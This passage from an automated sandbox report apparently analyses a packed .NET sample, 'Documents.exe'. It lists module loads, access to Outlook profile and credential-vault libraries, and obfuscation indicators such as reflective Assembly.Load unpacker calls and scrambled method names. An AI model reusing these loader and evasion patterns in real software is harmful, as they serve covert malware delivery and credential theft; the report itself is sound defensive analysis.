                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                    Source: Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2340231400.0000000001058000.00000004.00000020.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000010.00000002.4499291759.0000000000B18000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vWFGbvOdxI.exe, 00000010.00000002.4499807449.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4499818518.0000000000E2E000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.0000000004510000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2341815008.000000000435E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000003.2340058980.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500442013.00000000046AE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: RegSvcs.pdb source: systray.exe, 00000011.00000002.4498880450.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2632346908.0000000030C3C000.00000004.80000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 0.2.Documents.exe.5bd0000.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.cs.Net Code: imDpH89lry System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Documents.exe.5bd0000.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, iavCtQFueCRVgf9V4b.cs.Net Code: imDpH89lry System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F1A739 push A805B45Eh; iretd 0_2_05F1A745
                    Source: C:\Users\user\Desktop\Documents.exeCode function: 0_2_05F1A65F pushfd ; iretd 0_2_05F1A66D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004071DE push 6FB25C47h; retf 9_2_004071E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004031B0 push eax; ret 9_2_004031B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040B9B7 push ebp; retf 9_2_0040B9BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004172E9 push dword ptr [esi+eax*2+5Fh]; retf 9_2_004172F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004133E3 push ss; retn A658h9_2_0041350B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00414BF2 push edi; ret 9_2_00414C12
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00414C28 push edi; ret 9_2_00414C12
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00418D95 pushfd ; retf 9_2_00418DAD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00415661 push edx; iretd 9_2_00415662
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E09AD push ecx; mov dword ptr [esp], ecx9_2_014E09B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116C54F push 8B010F67h; ret 15_2_0116C554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116C54D pushfd ; ret 15_2_0116C54E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011209AD push ecx; mov dword ptr [esp], ecx15_2_011209B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116C9D7 push edi; ret 15_2_0116C9D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F1368 push eax; iretd 15_2_010F1369
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F1FEC push eax; iretd 15_2_010F1FED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01177E99 push ecx; ret 15_2_01177EAC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029EE26A push eax; iretd 16_2_029EE26B
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029ED8FA push edx; iretd 16_2_029ED8FB
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029F102E pushfd ; retf 16_2_029F1046
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029F0870 push eax; iretd 16_2_029F0871
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029ECE8B push edi; ret 16_2_029ECEAB
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029ECEC1 push edi; ret 16_2_029ECEAB
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029E3C50 push ebp; retf 16_2_029E3C57
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029DF477 push 6FB25C47h; retf 16_2_029DF481
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeCode function: 16_2_029EF582 push dword ptr [esi+eax*2+5Fh]; retf 16_2_029EF591
                    Source: Documents.exeStatic PE information: section name: .text entropy: 7.844297233774946
                    Source: uFEeKIucsX.exe.0.drStatic PE information: section name: .text entropy: 7.844297233774946
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, Gf3UqQuHQKmNjVRHiT.csHigh entropy of concatenated method names: 'qTMnJth4oW', 'wGCnjd67G8', 'kuFnAsIvnR', 'Tc3nunlJyT', 'g9dnxCpktS', 'HCXn0mwo3k', 'rkOn1JxGFe', 'rxhnYBq2Iu', 'Ic4nlx2nZL', 'zKFncfTDkZ'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, Pb8eXhL4Kqe82vcHaP.csHigh entropy of concatenated method names: 'wpcxBa7uaL', 'NsXxP0A5w9', 'VjUxLadLhC', 'EphxhYbP9u', 'w8TxtW2QBN', 'eT2xMHC6ne', 'Y1YxRXeXrG', 'Ulgx4ZTkdJ', 'oPlxTqqbwN', 'uhMx9p0B1P'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, jqZprwXDR5JDf5NEk4.csHigh entropy of concatenated method names: 'XOWly7kKiU', 'RQDltOkmDE', 'j3YlM5f4eO', 'IdQlRI7sh7', 'wBkl4EP4iU', 'GLHlTFSpBG', 'LmWl9IygAQ', 'QWNlbJb8jn', 'xaMlm7MtoE', 'GS5lBog6yw'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, OANgdeAkH9yusRxXWr.csHigh entropy of concatenated method names: 'ngSOLZK2uj', 'nQ5Oh0T93O', 'LRdOIA987C', 'z1xOrtaBkA', 'OeeOElSy7M', 'CEkOGPBKJ2', 'rQcOo3mpjn', 'g78OV5K7NL', 'nmoOXdVsRk', 'z0nOe7E9sC'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, V53PYhWCiyIxKMiS2SC.csHigh entropy of concatenated method names: 'ToString', 'AXSKAunulp', 'Ci1KucjXT2', 'yD8KvYbkyn', 'vtDKynmfou', 'x3LKtq0vWA', 'U7fKM8sSEL', 'zU7KRkRIEI', 'MvOhYie8P2QAI7F1UYw', 'ybr8o9ehL7eOCcjCq6Z'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, QmSiyozsHAhIftiSea.csHigh entropy of concatenated method names: 'H6fcjU0oHA', 'oc8cAxpiHL', 'lbLcugDmjU', 'SGicy7KD2j', 'r6YctpOPiI', 'kATcR9ncba', 'H6ec4AeUel', 'uMic7XoQes', 'QkacDxR8eX', 'Cs6cahSCxe'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, PITEutvlXV5IsghPUP.csHigh entropy of concatenated method names: 'Igjq3CQFaK', 'Tk0qdkIJe3', 'ys9nM80gN3', 'w0snRYcrXd', 'VwYn44nhZ7', 'fBGnTJ8KgP', 'iaSn9a77N5', 'Q6ZnbPsm7O', 'wWtnmJFh0C', 'epmnBL80Ea'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, gB7VL3IrSJVnBcdnXA.csHigh entropy of concatenated method names: 'ToString', 'ldQ084290g', 'tgL0tDv0YF', 'FZL0Mc9ZOP', 'HLC0RSC7uU', 'HLS041bWaq', 'f6I0TiTxxe', 'OTN09XJAG0', 'nsC0bEseyS', 'eR40mj62nW'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, XfWRgdWpIlxoZYmckMS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lFCgl6ZZaN', 'wyQgcfbuJN', 'jlkgKaMv7M', 'QIggg2VbOa', 'I8kgZWu9JJ', 'avGgwTjROI', 'wdjg7BynlE'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, Y1BLhwWWfyC5nKLv9Za.csHigh entropy of concatenated method names: 'W5jceUrhIl', 'AG1czR6AYH', 'tyyKQyUQQT', 'l36KWDxsYg', 'V09KCPw58w', 'zLUK6cjnMA', 'VPXKpqe8Nu', 'CSaKs7HkJ2', 'kibKUeUrte', 'iRRKOBgkGK'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, l0934OowxrH8VUlRxi.csHigh entropy of concatenated method names: 'mKQlxBMbth', 'X6Xl1W3a5p', 'hQHllXoKNP', 'xOOlKMZ9l2', 'zJMlZhHoVT', 'j17l7inY0T', 'Dispose', 'rfuYUC5WuX', 'y00YOJO9S6', 'sq5Yn5Hpau'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, Lhm7DZWQpkQtvGq28Al.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mLnc8Y3Y5l', 'HngcPiPnAi', 'TkXckiVk5P', 'nNocLEB0pp', 'wFfchuW4ga', 'CticIwjmJ4', 'LWxcrxcBoM'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, hupJuROPNJ0JAPf84f.csHigh entropy of concatenated method names: 'Dispose', 'TH8WXVUlRx', 'RVnCt8RqHX', 'oZrHXkq0bx', 'juKWeyiRta', 'fyTWzKYi4E', 'ProcessDialogKey', 'wZiCQqZprw', 'xR5CWJDf5N', 'Uk4CCQDUZU'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, zrOvj2n9Vlx5bygFRJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Pw5CX6o5o9', 'LjBCeorBc9', 'N0VCzPWAZP', 'k2m6QZeY4b', 'cu66WD12bd', 'Ju26C0C4a2', 'x6f66CheqM', 'RSipRtGxGayDC0YmOVm'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, nm3pWgkYqwy0t9xZiA.csHigh entropy of concatenated method names: 'Wej2AAZmI8', 'gQi2uQEtNF', 'PuG2yvVRxW', 'ImY2t1vSyS', 'QOF2RCxg7R', 'rbj24913s9', 'GHo29Tqm5t', 'zPN2bcP7P8', 'MsT2B8fXOX', 'Aox28GBAZT'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, f8eWA89amDDfegLMiD.csHigh entropy of concatenated method names: 'VgtiUg7VFM', 'og8inDlmh5', 'exHiSfcAD4', 'lXuSefjiKc', 'Ox7Szl14WQ', 'JFCiQeM8Fq', 'krwiWayKZD', 'F8HiCCvqnd', 'P3ji6aYs66', 'rw8ipEW1wN'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, Ygr0TnyR1LkSW9E0Em.csHigh entropy of concatenated method names: 'MEtSswHPND', 'nibSOtogde', 'zwrSqL3H3j', 'P34SiASpjZ', 'iM1SFnEFDi', 'Jc1qEFYBes', 'VpBqGD7KMC', 'OZ9qohy0MZ', 'RD6qVW6nYr', 'r2YqXlK5lP'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, nXi6WDpjLanAGQf496.csHigh entropy of concatenated method names: 'sV8WiANgde', 'QH9WFyusRx', 'aHQWfKmNjV', 'IHiWNTPITE', 'uhPWxUPegr', 'pTnW0R1LkS', 'htdBVGwISXW748njUm', 'PuFWmCKFectgBIUybO', 'wXcWWl6IiG', 'mjiW6Ogvcn'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, BSa6rSCOgMEo3mQXEh.csHigh entropy of concatenated method names: 'GvcHb8qnr', 'RGTJkIxqY', 'dO9jIqEnd', 'nMHdYyWwk', 'SRnuSfgAi', 'TofvyiYs6', 'aMYAI0lWhGbmfUFaXb', 'lMwdKs9ybppj3IOpql', 'lK7YNqDub', 'hvWcZgiJo'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, RGS22NmfvosZB4XiiT.csHigh entropy of concatenated method names: 'TBoiD6swb5', 'fg6ia5bLld', 'ALHiH7T52x', 'd96iJqAPgP', 'Tlui3GTRlW', 'zwvijTsFCN', 'YxXidnBonM', 'IfSiArUt1V', 'f96iumDplg', 'qX4ivNWXL6'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, aDUZU1eKdyWMPTRpWG.csHigh entropy of concatenated method names: 'Wljcnfqkja', 'sX2cq1AvY3', 'FogcS286xL', 'EpAcibLPtr', 'YeFclcqFn5', 'H6OcFbYvEw', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, iavCtQFueCRVgf9V4b.csHigh entropy of concatenated method names: 'Chp6suQRvx', 'Giy6Ufsr0i', 'Ndr6O8oaxA', 'Wg36nKnAOm', 'xua6q5KWgy', 'KG26SNFvnK', 'jN56iGN4VO', 'uyf6FPDY7W', 'K1f65jOhlM', 'vhN6fB8aFb'
                    Source: 0.2.Documents.exe.78d0000.4.raw.unpack, AIFAptGR9eg5muxjTc.csHigh entropy of concatenated method names: 'FqZ1VVD05h', 'FiJ1eDeV12', 'TwQYQOLHOI', 'SylYWqlulI', 'SA218IdUmA', 'Gt91P3b74n', 'XoF1kATh1H', 'oL91LtYMHp', 'kK11hrvgll', 'Obb1I2OD4v'
                    Source: 0.2.Documents.exe.5bd0000.3.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                    Source: 0.2.Documents.exe.5bd0000.3.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                    Source: 0.2.Documents.exe.5bd0000.3.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, Gf3UqQuHQKmNjVRHiT.csHigh entropy of concatenated method names: 'qTMnJth4oW', 'wGCnjd67G8', 'kuFnAsIvnR', 'Tc3nunlJyT', 'g9dnxCpktS', 'HCXn0mwo3k', 'rkOn1JxGFe', 'rxhnYBq2Iu', 'Ic4nlx2nZL', 'zKFncfTDkZ'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, Pb8eXhL4Kqe82vcHaP.csHigh entropy of concatenated method names: 'wpcxBa7uaL', 'NsXxP0A5w9', 'VjUxLadLhC', 'EphxhYbP9u', 'w8TxtW2QBN', 'eT2xMHC6ne', 'Y1YxRXeXrG', 'Ulgx4ZTkdJ', 'oPlxTqqbwN', 'uhMx9p0B1P'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, jqZprwXDR5JDf5NEk4.csHigh entropy of concatenated method names: 'XOWly7kKiU', 'RQDltOkmDE', 'j3YlM5f4eO', 'IdQlRI7sh7', 'wBkl4EP4iU', 'GLHlTFSpBG', 'LmWl9IygAQ', 'QWNlbJb8jn', 'xaMlm7MtoE', 'GS5lBog6yw'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, OANgdeAkH9yusRxXWr.csHigh entropy of concatenated method names: 'ngSOLZK2uj', 'nQ5Oh0T93O', 'LRdOIA987C', 'z1xOrtaBkA', 'OeeOElSy7M', 'CEkOGPBKJ2', 'rQcOo3mpjn', 'g78OV5K7NL', 'nmoOXdVsRk', 'z0nOe7E9sC'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, V53PYhWCiyIxKMiS2SC.csHigh entropy of concatenated method names: 'ToString', 'AXSKAunulp', 'Ci1KucjXT2', 'yD8KvYbkyn', 'vtDKynmfou', 'x3LKtq0vWA', 'U7fKM8sSEL', 'zU7KRkRIEI', 'MvOhYie8P2QAI7F1UYw', 'ybr8o9ehL7eOCcjCq6Z'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, QmSiyozsHAhIftiSea.csHigh entropy of concatenated method names: 'H6fcjU0oHA', 'oc8cAxpiHL', 'lbLcugDmjU', 'SGicy7KD2j', 'r6YctpOPiI', 'kATcR9ncba', 'H6ec4AeUel', 'uMic7XoQes', 'QkacDxR8eX', 'Cs6cahSCxe'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, PITEutvlXV5IsghPUP.csHigh entropy of concatenated method names: 'Igjq3CQFaK', 'Tk0qdkIJe3', 'ys9nM80gN3', 'w0snRYcrXd', 'VwYn44nhZ7', 'fBGnTJ8KgP', 'iaSn9a77N5', 'Q6ZnbPsm7O', 'wWtnmJFh0C', 'epmnBL80Ea'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, gB7VL3IrSJVnBcdnXA.csHigh entropy of concatenated method names: 'ToString', 'ldQ084290g', 'tgL0tDv0YF', 'FZL0Mc9ZOP', 'HLC0RSC7uU', 'HLS041bWaq', 'f6I0TiTxxe', 'OTN09XJAG0', 'nsC0bEseyS', 'eR40mj62nW'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, XfWRgdWpIlxoZYmckMS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lFCgl6ZZaN', 'wyQgcfbuJN', 'jlkgKaMv7M', 'QIggg2VbOa', 'I8kgZWu9JJ', 'avGgwTjROI', 'wdjg7BynlE'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, Y1BLhwWWfyC5nKLv9Za.csHigh entropy of concatenated method names: 'W5jceUrhIl', 'AG1czR6AYH', 'tyyKQyUQQT', 'l36KWDxsYg', 'V09KCPw58w', 'zLUK6cjnMA', 'VPXKpqe8Nu', 'CSaKs7HkJ2', 'kibKUeUrte', 'iRRKOBgkGK'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, l0934OowxrH8VUlRxi.csHigh entropy of concatenated method names: 'mKQlxBMbth', 'X6Xl1W3a5p', 'hQHllXoKNP', 'xOOlKMZ9l2', 'zJMlZhHoVT', 'j17l7inY0T', 'Dispose', 'rfuYUC5WuX', 'y00YOJO9S6', 'sq5Yn5Hpau'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, Lhm7DZWQpkQtvGq28Al.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mLnc8Y3Y5l', 'HngcPiPnAi', 'TkXckiVk5P', 'nNocLEB0pp', 'wFfchuW4ga', 'CticIwjmJ4', 'LWxcrxcBoM'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, hupJuROPNJ0JAPf84f.csHigh entropy of concatenated method names: 'Dispose', 'TH8WXVUlRx', 'RVnCt8RqHX', 'oZrHXkq0bx', 'juKWeyiRta', 'fyTWzKYi4E', 'ProcessDialogKey', 'wZiCQqZprw', 'xR5CWJDf5N', 'Uk4CCQDUZU'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, zrOvj2n9Vlx5bygFRJ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Pw5CX6o5o9', 'LjBCeorBc9', 'N0VCzPWAZP', 'k2m6QZeY4b', 'cu66WD12bd', 'Ju26C0C4a2', 'x6f66CheqM', 'RSipRtGxGayDC0YmOVm'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, nm3pWgkYqwy0t9xZiA.csHigh entropy of concatenated method names: 'Wej2AAZmI8', 'gQi2uQEtNF', 'PuG2yvVRxW', 'ImY2t1vSyS', 'QOF2RCxg7R', 'rbj24913s9', 'GHo29Tqm5t', 'zPN2bcP7P8', 'MsT2B8fXOX', 'Aox28GBAZT'
                    Source: 0.2.Documents.exe.4406868.1.raw.unpack, f8eWA89amDDfegLMiD.csHigh entropy of concatenated method names: 'VgtiUg7VFM', 'og8inDlmh5', 'exHiSfcAD4', 'lXuSefjiKc', 'Ox7Szl14WQ', 'JFCiQeM8Fq', 'krwiWayKZD', 'F8HiCCvqnd', 'P3ji6aYs66', 'rw8ipEW1wN'
